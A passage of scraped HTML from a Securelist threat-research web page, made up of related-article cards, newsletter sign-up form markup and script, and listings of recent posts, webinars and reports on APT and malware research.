class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/transparent-tribe-part-1/98127/" class="c-card__link">Transparent Tribe: Evolution analysis, part 1</a></h3> </header> </div> </article> </div> </div> </div> </div> <div class="c-widget__wrapper"> <div class="c-widget-subscribe js-sticky-widget"> <div class="c-block__header"> <h5 class="c-title--small">Subscribe to our weekly e-mails</h5> <p>The hottest research right in your inbox</p> </div> <div class="c-form--float-labels js-float-labels"> <script type="text/javascript"></script> <div class='gf_browser_chrome gform_wrapper gform_wrapper_original_id_11 gravity-theme subscribe-mc_wrapper' id='gform_wrapper_2497380334' ><div id='gf_2497380334' class='gform_anchor' tabindex='-1'></div><form method='post' enctype='multipart/form-data' target='gform_ajax_frame_2497380334' id='gform_2497380334' class='subscribe-mc' action='/goldenjackal-apt-group/109677/#gf_2497380334' > <div class="gform-content-wrapper"><div class='gform_body gform-body'><div id='gform_fields_2497380334' class='gform_fields top_label form_sublabel_below description_below'><div id="field_11_1" class="gfield gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible" ><label class='gfield_label screen-reader-text' for='input_2497380334_1' >Email<span class="gfield_required"><span class="gfield_required gfield_required_text">(Required)</span></span></label><div class='ginput_container ginput_container_email'> <input name='input_1' id='input_2497380334_1' type='text' value='' class='medium' placeholder='Email' aria-required="true" aria-invalid="false" /> </div></div><div id="field_11_3" class="gfield js-kaspersky-gform-recaptcha-placeholder gform_hidden field_sublabel_below field_description_below gfield_visibility_hidden" ><div class='ginput_container ginput_container_text'><input name='input_3' id='input_2497380334_3' type='hidden' class='gform_hidden' aria-invalid="false" value='' /></div></div><fieldset id="field_11_2" class="gfield input-without-label label-gdpr gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible" ><legend class='gfield_label screen-reader-text gfield_label_before_complex' ><span class="gfield_required"><span class="gfield_required gfield_required_text">(Required)</span></span></legend><div class='ginput_container ginput_container_checkbox'><div class='gfield_checkbox' id='input_2497380334_2'><div class='gchoice gchoice_11_2_1'> <input class='gfield-choice-input' name='input_2.1' type='checkbox' value='I agree' id='choice_2497380334_11_2_1' /> <label for='choice_2497380334_11_2_1' id='label_2497380334_11_2_1'>I agree to provide my email address to “AO Kaspersky Lab” to receive information about new posts on the site. I understand that I can withdraw this consent at any time via e-mail by clicking the “unsubscribe” link that I find at the bottom of any e-mail sent to me for the purposes mentioned above.</label> </div></div></div></fieldset></div></div> <div class='gform_footer top_label'> <button type="submit" class="gform_button button" id='gform_submit_button_2497380334' value="Sign up"> <svg class="o-icon o-svg-icon o-svg-large"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-envelope"></use></svg> <span>Subscribe</span> </button> <input type='hidden' name='gform_ajax' value='form_id=11&amp;title=&amp;description=&amp;tabindex=0' /> <input type='hidden' class='gform_hidden' name='is_submit_11' value='1' /> <input type='hidden' class='gform_hidden' name='gform_submit' value='11' /> <input type='hidden' class='gform_hidden' name='gform_unique_id' value='' /> <input type='hidden' class='gform_hidden' name='state_11' value='WyJbXSIsImIwODQwZTA2ZGQ0NzYwODcyOTBkZjNmZDM1NDk2Y2ZkIl0=' /> <input type='hidden' class='gform_hidden' name='gform_target_page_number_11' id='gform_target_page_number_2497380334_11' value='0' /> <input type='hidden' class='gform_hidden' name='gform_source_page_number_11' id='gform_source_page_number_2497380334_11' value='1' /> <input type='hidden' name='gform_random_id' value='2497380334' /><input type='hidden' name='gform_field_values' value='securelist_2020_form_location=sidebar' /> </div> </div><p style="display: none !important;" class="akismet-fields-container" data-prefix="ak_"><label>&#916;<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input type="hidden" id="ak_js_2" name="ak_js" value="155"/><script>document.getElementById( "ak_js_2" ).setAttribute( "value", ( new Date() ).getTime() );</script></p></form> </div> <iframe style='display:none;width:0px;height:0px;' src='about:blank' name='gform_ajax_frame_2497380334' id='gform_ajax_frame_2497380334' title='This iframe contains the logic required to handle Ajax powered Gravity Forms.'></iframe> <script type="text/javascript"> /* <![CDATA[ */ gform.initializeOnLoaded( function() {gformInitSpinner( 2497380334, 'https://securelist.com/wp-content/themes/securelist2020/assets/images/content/ajax-spinner-red.svg' );jQuery('#gform_ajax_frame_2497380334').on('load',function(){var contents = jQuery(this).contents().find('*').html();var is_postback = contents.indexOf('GF_AJAX_POSTBACK') >= 0;if(!is_postback){return;}var form_content = jQuery(this).contents().find('#gform_wrapper_2497380334');var is_confirmation = jQuery(this).contents().find('#gform_confirmation_wrapper_2497380334').length > 0;var is_redirect = contents.indexOf('gformRedirect(){') >= 0;var is_form = form_content.length > 0 && ! is_redirect && ! is_confirmation;var mt = parseInt(jQuery('html').css('margin-top'), 10) + parseInt(jQuery('body').css('margin-top'), 10) + 100;if(is_form){jQuery('#gform_wrapper_2497380334').html(form_content.html());if(form_content.hasClass('gform_validation_error')){jQuery('#gform_wrapper_2497380334').addClass('gform_validation_error');} else {jQuery('#gform_wrapper_2497380334').removeClass('gform_validation_error');}setTimeout( function() { /* delay the scroll by 50 milliseconds to fix a bug in chrome */ jQuery(document).scrollTop(jQuery('#gform_wrapper_2497380334').offset().top - mt); }, 50 );if(window['gformInitDatepicker']) {gformInitDatepicker();}if(window['gformInitPriceFields']) {gformInitPriceFields();}var current_page = jQuery('#gform_source_page_number_2497380334_11').val();gformInitSpinner( 2497380334, 'https://securelist.com/wp-content/themes/securelist2020/assets/images/content/ajax-spinner-red.svg' );jQuery(document).trigger('gform_page_loaded', [2497380334, current_page]);window['gf_submitting_2497380334'] = false;}else if(!is_redirect){var confirmation_content = jQuery(this).contents().find('.GF_AJAX_POSTBACK').html();if(!confirmation_content){confirmation_content = contents;}setTimeout(function(){jQuery('#gform_wrapper_2497380334').replaceWith(confirmation_content);jQuery(document).scrollTop(jQuery('#gf_2497380334').offset().top - mt);jQuery(document).trigger('gform_confirmation_loaded', [2497380334]);window['gf_submitting_2497380334'] = false;wp.a11y.speak(jQuery('#gform_confirmation_message_2497380334').text());}, 50);}else{jQuery('#gform_2497380334').append(contents);if(window['gformRedirect']) {gformRedirect();}}jQuery(document).trigger('gform_post_render', [2497380334, current_page]);} );} ); /* ]]> */ </script> </div> </div> </div> <div class="c-widget__wrapper"> <div class="js-sticky-widget"> <p><span class="c-tag c-tag--primary">In the same category</span></p> <div class="o-row o-row--small-gutters"> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/eagerbee-backdoor/115175/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/28082809/SL-EagerBee-backdoor-featured-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/28082809/SL-EagerBee-backdoor-featured-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/eagerbee-backdoor/115175/" class="c-card__link">EAGERBEE, with updated and novel components, targets the Middle East</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/bellacpp-cpp-version-of-bellaciao/115087/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/19145053/SL-Bella-featured-1-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/19145053/SL-Bella-featured-1-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/bellacpp-cpp-version-of-bellaciao/115087/" class="c-card__link">BellaCPP: Discovering a new BellaCiao variant written in C++</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/lazarus-new-malware/115059/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/18184101/SL-Lazarus-multi-malware-attack-featured-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/18184101/SL-Lazarus-multi-malware-attack-featured-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/lazarus-new-malware/115059/" class="c-card__link">Lazarus group evolves its infection chain with old and new malware</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/careto-is-back/114942/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/12093659/SL-Careto-featured-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/12093659/SL-Careto-featured-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/careto-is-back/114942/" class="c-card__link">Careto is back: what&#8217;s new after 10 years of silence?</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/apt-report-q3-2024/114623/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/11/27181956/SL-APT-report-Q3-2024-featured-2-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/11/27181956/SL-APT-report-Q3-2024-featured-2-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/apt-report-q3-2024/114623/" class="c-card__link">APT trends report Q3 2024</a></h3> </header> </div> </article> </div> </div> </div> </div> <li id="text-22" class="widget widget_text"> <div class="textwidget"><p><a href="https://www.kaspersky.com/next?icid=gl_KNext_acq_ona_smm__onl_b2b_securelist_ban_sm-team___knext___" target="_blank" rel="noopener"><img decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/10092503/NEXT_310x420_EN_1.jpg" width="370" /></a></p> </div> </li> </div> </div> </div> </div> <div class="c-article__progress rpi-progress-bar"> <div class="c-article__progress-bar__position rpi-progress-bar__position"></div> <div class="rpi-progress-bar__percentage"></div> </div> </article> </div> </section> <section class="c-block c-block--spacing-t-small c-block--spacing-b-small@md c-block--divider-internal"> <div class="o-container-fluid"> <h5 class="c-block__title">Latest Posts</h5> <div class="o-row o-row--small-gutters@sm c-card__row c-card__row--fixed-width-down@sm js-slider-posts-mobile"> <div class="o-col-6@sm o-col-3@md"> <article class="c-card c-card--standard@xs"> <a href="https://securelist.com/tria-stealer-collects-sms-data-from-android-devices/115295/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/01/23083642/tria-stealer-featured-image-updated-1-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/01/23083642/tria-stealer-featured-image-updated-1-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <p class="c-card__headline u-hidden u-block@md"> <a href="https://securelist.com/category/malware-descriptions/" class="c-tag c-tag--primary">Malware descriptions</a> </p> <h3 class="c-card__title"><a href="https://securelist.com/tria-stealer-collects-sms-data-from-android-devices/115295/" class="c-card__link">No need to RSVP: a closer look at the Tria stealer campaign</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/fareedradzi/" > <span>Fareed Radzi</span></a> </li> </ul> </div> </footer> </div> </article> </div> <div class="o-col-6@sm o-col-3@md"> <article class="c-card c-card--standard@xs"> <a href="https://securelist.com/industrial-threat-predictions-2025/115327/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/01/28200425/KSB-ICS-threat-predictions-2025-800x450.png" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" srcset="" sizes="auto, (max-width: 800px) 100vw, 800px" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/01/28200425/KSB-ICS-threat-predictions-2025-800x450.png" data-srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/01/28200425/KSB-ICS-threat-predictions-2025-800x450.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/01/28200425/KSB-ICS-threat-predictions-2025-300x170.png 300w" /> </a> <div class="c-card__body"> <header class="c-card__header"> <p class="c-card__headline u-hidden u-block@md"> <a href="https://securelist.com/category/kaspersky-security-bulletin/" class="c-tag c-tag--primary">Kaspersky Security Bulletin</a> </p> <h3 class="c-card__title"><a href="https://securelist.com/industrial-threat-predictions-2025/115327/" class="c-card__link">Threat predictions for industrial enterprises 2025</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/evgenygoncharov/" > <span>Evgeny Goncharov</span></a> </li> </ul> </div> </footer> </div> </article> </div> <div class="o-col-6@sm o-col-3@md"> <article class="c-card c-card--standard@xs"> <a href="https://securelist.com/mercedes-benz-head-unit-security-research/115218/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/01/16112547/mercedes-benz-featured-image-3-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/01/16112547/mercedes-benz-featured-image-3-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <p class="c-card__headline u-hidden u-block@md"> <a href="https://securelist.com/category/research/" class="c-tag c-tag--primary">Research</a> </p> <h3 class="c-card__title"><a href="https://securelist.com/mercedes-benz-head-unit-security-research/115218/" class="c-card__link">Mercedes-Benz Head Unit security research report</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/securityservices/" > <span>Kaspersky Security Services</span></a> </li> </ul> </div> </footer> </div> </article> </div> <div class="o-col-6@sm o-col-3@md"> <article class="c-card c-card--standard@xs"> <a href="https://securelist.com/eagerbee-backdoor/115175/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/28082809/SL-EagerBee-backdoor-featured-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/28082809/SL-EagerBee-backdoor-featured-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <p class="c-card__headline u-hidden u-block@md"> <a href="https://securelist.com/category/apt-reports/" class="c-tag c-tag--primary">APT reports</a> </p> <h3 class="c-card__title"><a href="https://securelist.com/eagerbee-backdoor/115175/" class="c-card__link">EAGERBEE, with updated and novel components, targets the Middle East</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/saurabhsharma/" > <span>Saurabh Sharma</span></a> </li> <li> <a href="https://securelist.com/author/vasilyberdnikov/" > <span>Vasily Berdnikov</span></a> </li> </ul> </div> </footer> </div> </article> </div> </div> </div> </section> <section class="c-block c-block--spacing-t-small c-block--spacing-b-small@md c-block--divider-internal" data-element-id="latest-webinars-post-section"> <div class="o-container-fluid"> <h5 class="c-block__title">Latest Webinars</h5> <div class="o-row o-row--small-gutters@sm c-card__row c-card__row--fixed-width-down@sm js-slider-posts-mobile"> <div class="o-col-6@sm o-col-3@md"> <article class="c-card c-card--standard@xs"> <div class="c-card__figure"> <a href="https://securelist.com/webinars/from-chaos-to-control-streamlining-detection-engineering-in-security-operation-centers/" class="c-card__figure-link" data-element-id="latest-webinars-post-image"> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/02/14115336/webinar_Detection_Engineering_243x136-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail" alt="" title="" decoding="async" loading="lazy" srcset="" sizes="auto, (max-width: 800px) 100vw, 800px" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/02/14115336/webinar_Detection_Engineering_243x136-800x450.jpg" data-srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/02/14115336/webinar_Detection_Engineering_243x136-800x450.jpg 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/02/14115336/webinar_Detection_Engineering_243x136-300x168.jpg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/02/14115336/webinar_Detection_Engineering_243x136-500x280.jpg 500w" /> </a> </div> <div class="c-card__body"> <header class="c-card__header"> <p class="c-card__headline"> <a href="https://securelist.com/webinar-category/trainings-and-workshops/" class="c-tag c-tag--primary c-tag--has-icon" data-element-id="latest-webinars-post-category"><span class="c-tag__icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></span>Trainings and workshops</a> </p> <div class="u-flex u-justify-between"> <time datetime="2024-12-23T17:00:00+00:00" class="c-card__event-date"> 23 Dec 2024, 5:00pm </time> <span class="c-card__event-date">60 min</span> </div> <h3 class="c-card__title"><a href="https://securelist.com/webinars/from-chaos-to-control-streamlining-detection-engineering-in-security-operation-centers/" class="c-card__link" data-element-id="latest-webinars-post-title">From chaos to control: streamlining detection engineering in Security Operation Centers</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/sarimrafiq/" data-element-id="latest-webinars-post-author"> <span>Sarim Rafiq Uddin</span></a> </li> </ul> </div> </footer> </div> </article> </div> <div class="o-col-6@sm o-col-3@md"> <article class="c-card c-card--standard@xs"> <div class="c-card__figure"> <a href="https://securelist.com/webinars/%d1%81rimeware-and-financial-cyberthreats-in-2025/" class="c-card__figure-link" data-element-id="latest-webinars-post-image"> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/20171256/webinar_crimeware_ksb-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail" alt="" title="" decoding="async" loading="lazy" srcset="" sizes="auto, (max-width: 800px) 100vw, 800px" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/20171256/webinar_crimeware_ksb-800x450.jpg" data-srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/20171256/webinar_crimeware_ksb-800x450.jpg 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/20171256/webinar_crimeware_ksb-300x168.jpg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/20171256/webinar_crimeware_ksb-500x280.jpg 500w" /> </a> </div> <div class="c-card__body"> <header class="c-card__header"> <p class="c-card__headline"> <a href="https://securelist.com/webinar-category/cyberthreat-talks/" class="c-tag c-tag--primary c-tag--has-icon" data-element-id="latest-webinars-post-category"><span class="c-tag__icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></span>Cyberthreat talks</a> </p> <div class="u-flex u-justify-between"> <time datetime="2024-12-17T17:00:00+00:00" class="c-card__event-date"> 17 Dec 2024, 5:00pm </time> <span class="c-card__event-date">60 min</span> </div> <h3 class="c-card__title"><a href="https://securelist.com/webinars/%d1%81rimeware-and-financial-cyberthreats-in-2025/" class="c-card__link" data-element-id="latest-webinars-post-title">Сrimeware and financial cyberthreats in 2025</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/fabioa/" data-element-id="latest-webinars-post-author"> <span>Fabio Assolini</span></a> </li> <li> <a href="https://securelist.com/author/marcrivero/" data-element-id="latest-webinars-post-author"> <span>Marc Rivero</span></a> </li> <li> <a href="https://securelist.com/author/tatyanashishkova/" data-element-id="latest-webinars-post-author"> <span>Tatyana Shishkova</span></a> </li> </ul> </div> </footer> </div> </article> </div> <div class="o-col-6@sm o-col-3@md"> <article class="c-card c-card--standard@xs"> <div class="c-card__figure"> <a href="https://securelist.com/webinars/global-it-outages-and-supply-chain-attacks-2024s-lessons-and-tomorrows-cyberthreats/" class="c-card__figure-link" data-element-id="latest-webinars-post-image"> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/20170250/webinar_story_of_the_year_2024-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail" alt="" title="" decoding="async" loading="lazy" srcset="" sizes="auto, (max-width: 800px) 100vw, 800px" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/20170250/webinar_story_of_the_year_2024-800x450.jpg" data-srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/20170250/webinar_story_of_the_year_2024-800x450.jpg 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/20170250/webinar_story_of_the_year_2024-300x168.jpg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/12/20170250/webinar_story_of_the_year_2024-500x280.jpg 500w" /> </a> </div> <div class="c-card__body"> <header class="c-card__header"> <p class="c-card__headline"> <a href="https://securelist.com/webinar-category/cyberthreat-talks/" class="c-tag c-tag--primary c-tag--has-icon" data-element-id="latest-webinars-post-category"><span class="c-tag__icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></span>Cyberthreat talks</a> </p> <div class="u-flex u-justify-between"> <time datetime="2024-12-09T17:00:00+00:00" class="c-card__event-date"> 09 Dec 2024, 5:00pm </time> <span class="c-card__event-date">60 min</span> </div> <h3 class="c-card__title"><a href="https://securelist.com/webinars/global-it-outages-and-supply-chain-attacks-2024s-lessons-and-tomorrows-cyberthreats/" class="c-card__link" data-element-id="latest-webinars-post-title">Global IT outages and supply chain attacks: 2024&#8217;s lessons and tomorrow&#8217;s cyberthreats</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/igorsoumenkov/" data-element-id="latest-webinars-post-author"> <span>Igor Kuznetsov</span></a> </li> <li> <a href="https://securelist.com/author/alexanderliskin/" data-element-id="latest-webinars-post-author"> <span>Alexander Liskin</span></a> </li> <li> <a href="https://securelist.com/author/vladimirkuskov/" data-element-id="latest-webinars-post-author"> <span>Vladimir Kuskov</span></a> </li> </ul> </div> </footer> </div> </article> </div> <div class="o-col-6@sm o-col-3@md"> <article class="c-card c-card--standard@xs"> <div class="c-card__figure"> <a href="https://securelist.com/webinars/missed-cyberthreats-real-world-cases-where-compromise-assessment-uncovered-what-was-overlooked/" class="c-card__figure-link" data-element-id="latest-webinars-post-image"> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/29082934/SL-compromise-assessment-featured-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail" alt="" title="" decoding="async" loading="lazy" srcset="" sizes="auto, (max-width: 800px) 100vw, 800px" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/29082934/SL-compromise-assessment-featured-800x450.jpg" data-srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/29082934/SL-compromise-assessment-featured-800x450.jpg 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/29082934/SL-compromise-assessment-featured-300x168.jpg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/29082934/SL-compromise-assessment-featured-500x280.jpg 500w" /> </a> </div> <div class="c-card__body"> <header class="c-card__header"> <p class="c-card__headline"> <a href="https://securelist.com/webinar-category/threat-intelligence-and-incident-response/" class="c-tag c-tag--primary c-tag--has-icon" data-element-id="latest-webinars-post-category"><span class="c-tag__icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></span>Threat intelligence and IR</a> </p> <div class="u-flex u-justify-between"> <time datetime="2024-10-29T17:00:00+00:00" class="c-card__event-date"> 29 Oct 2024, 5:00pm </time> <span class="c-card__event-date">60 min</span> </div> <h3 class="c-card__title"><a href="https://securelist.com/webinars/missed-cyberthreats-real-world-cases-where-compromise-assessment-uncovered-what-was-overlooked/" class="c-card__link" data-element-id="latest-webinars-post-title">Missed cyberthreats: real-world cases where compromise assessment uncovered what was overlooked</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/victorsergeev/" data-element-id="latest-webinars-post-author"> <span>Victor Sergeev</span></a> </li> <li> <a href="https://securelist.com/author/amgedwageh/" data-element-id="latest-webinars-post-author"> <span>Amged Wageh</span></a> </li> </ul> </div> </footer> </div> </article> </div> </div> </div> </section> <section data-element-id="footer-reports-section" class="c-block c-block--spacing-t-small c-block--spacing-b-small@md c-block--divider-internal"> <div class="o-container-fluid"> <h5 class="c-block__title">Reports</h5> <div class="o-row o-row--small-gutters"> <div class="o-col-8@sm"> <div class="o-row o-row--small-gutters"> <div class="o-col-6@md"> <article class="c-card c-card--standard@xs"> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a data-element-id="footer-reports-title" href="https://securelist.com/eagerbee-backdoor/115175/" class="c-card__link">EAGERBEE, with updated and novel components, targets the Middle East</a></h3> </header> <div class="c-card__desc"> <p>Kaspersky researchers analyze EAGERBEE backdoor modules, revealing a possible connection to the CoughingDown APT actor.</p> </div> </div> </article> </div> <div class="o-col-6@md c-card__dividers c-card__dividers--hide@md"> <article class="c-card c-card--standard@xs"> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a data-element-id="footer-reports-title" href="https://securelist.com/bellacpp-cpp-version-of-bellaciao/115087/" class="c-card__link">BellaCPP: Discovering a new BellaCiao variant written in C++</a></h3> </header> <div class="c-card__desc u-hidden u-block@md"> <p>While investigating an incident involving the BellaCiao .NET malware, Kaspersky researchers discovered a C++ version they dubbed &#8220;BellaCPP&#8221;.</p> </div> </div> </article> </div> <div class="o-col-6@md c-card__dividers c-card__dividers--hide@md"> <article class="c-card c-card--standard@xs"> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a data-element-id="footer-reports-title" href="https://securelist.com/lazarus-new-malware/115059/" class="c-card__link">Lazarus group evolves its infection chain with old and new malware</a></h3> </header> <div class="c-card__desc u-hidden u-block@md"> <p>Lazarus targets employees of a nuclear-related organization with a bunch of malware, such as MISTPEN, LPEClient, RollMid, CookieTime and a new modular backdoor CookiePlus.</p> </div> </div> </article> </div> <div class="o-col-6@md c-card__dividers c-card__dividers--hide@md"> <article class="c-card c-card--standard@xs"> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a data-element-id="footer-reports-title" href="https://securelist.com/careto-is-back/114942/" class="c-card__link">Careto is back: what&#8217;s new after 10 years of silence?</a></h3> </header> <div class="c-card__desc u-hidden u-block@md"> <p>Kaspersky researchers analyze 2019, 2022 and 2024 attacks attributed to Careto APT with medium to high confidence.</p> </div> </div> </article> </div> </div> </div> <div class="o-col-4@sm u-hidden u-block@sm"> <div class="c-image c-image--overflow-down@sm"> <a href="https://xtraining.kaspersky.com/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_ban_sm-team___xtraining____db5c7a1470cf39c3"><img src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/12/30141748/xTraining-evergreen-banner_370x500_EN.jpg" /></a> </div> </div> </div> </div> </section> <section class="c-block c-block--spacing-t-small c-block--spacing-b-small@md" data-element-id="footer-subscribe-section"> <div class="o-container-fluid"> <div class="o-row c-block__row u-flex-nowrap@md"> <div class="o-col"> <div class="c-block__header"> <h5 class="c-block__title">Subscribe to our weekly e-mails</h5> 